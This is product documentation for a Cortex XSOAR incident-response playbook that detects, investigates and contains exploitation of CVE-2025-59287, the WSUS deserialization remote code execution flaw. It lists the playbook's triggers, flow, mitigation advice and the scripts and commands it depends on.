CVE-2025-59287 - Microsoft WSUS Remote Code Execution
This Playbook is part of the Cortex Response And Remediation Pack.#
Supported versions
Supported Cortex XSOAR versions: 8.9.0 and later.
CVE-2025-59287 - Microsoft WSUS Remote Code Execution
Vulnerability Overview#
- Vulnerability Name: Microsoft Windows Server Update Service (WSUS) Deserialization of Untrusted Data Vulnerability
- CVE ID: CVE-2025-59287
- CVSS Score: 9.8 (Critical)
An unauthenticated remote code execution (RCE) vulnerability has been identified in Microsoft Windows Server Update Services (WSUS). Source: Unit42 - Palo Alto Networks
Mitigation and Recommendations#
- Apply Patch
- Restrict Access to the vulnerable serves
- Monitor for IoCs and suspicious traffic
Conclusion#
CVE‑2025‑59287 is a critical, remotely exploitable vulnerability in WSUS that allows unauthenticated attackers to execute arbitrary code with SYSTEM privileges.
View official CVE details on NIST
Playbook Triggers#
- Manually
- "CVE Exploitation - 2037164431" or "CVE Exploitation - 3823999562" Agents rules
Playbook Flow#
- Uses XQL to identify WSUS servers in your environment.
- Collects IOCs from the Unit42 blog.
- Uses XQL to detect any suspicious command lines indicative of exploitation of this vulnerability.
- Investigates the command lines to identify malicious indicators related to the vulnerability.
- Uses XQL to hunt for malicious IOCs.
- Isolates compromised WSUS servers.
- Blocks malicious indicators using the "Containment Plan – Block Indicators" playbook.
- Provides mitigation recommendations.
Dependencies#
This playbook uses the following sub-playbooks, integrations, and scripts.
Sub-playbooks#
- Containment Plan - Block Indicators
Integrations#
This playbook does not use any integrations.
Scripts#
- CommandLineAnalysis
- IsIntegrationAvailable
- ParseHTMLIndicators
- SetAndHandleEmpty
- isolate-endpoint
Commands#
- associateIndicatorsToAlert
- closeInvestigation
- createNewIndicator
- extractIndicators
- setAlert
- xdr-xql-generic-query
Playbook Inputs#
There are no inputs for this playbook.
Playbook Outputs#
There are no outputs for this playbook.
Playbook Image#
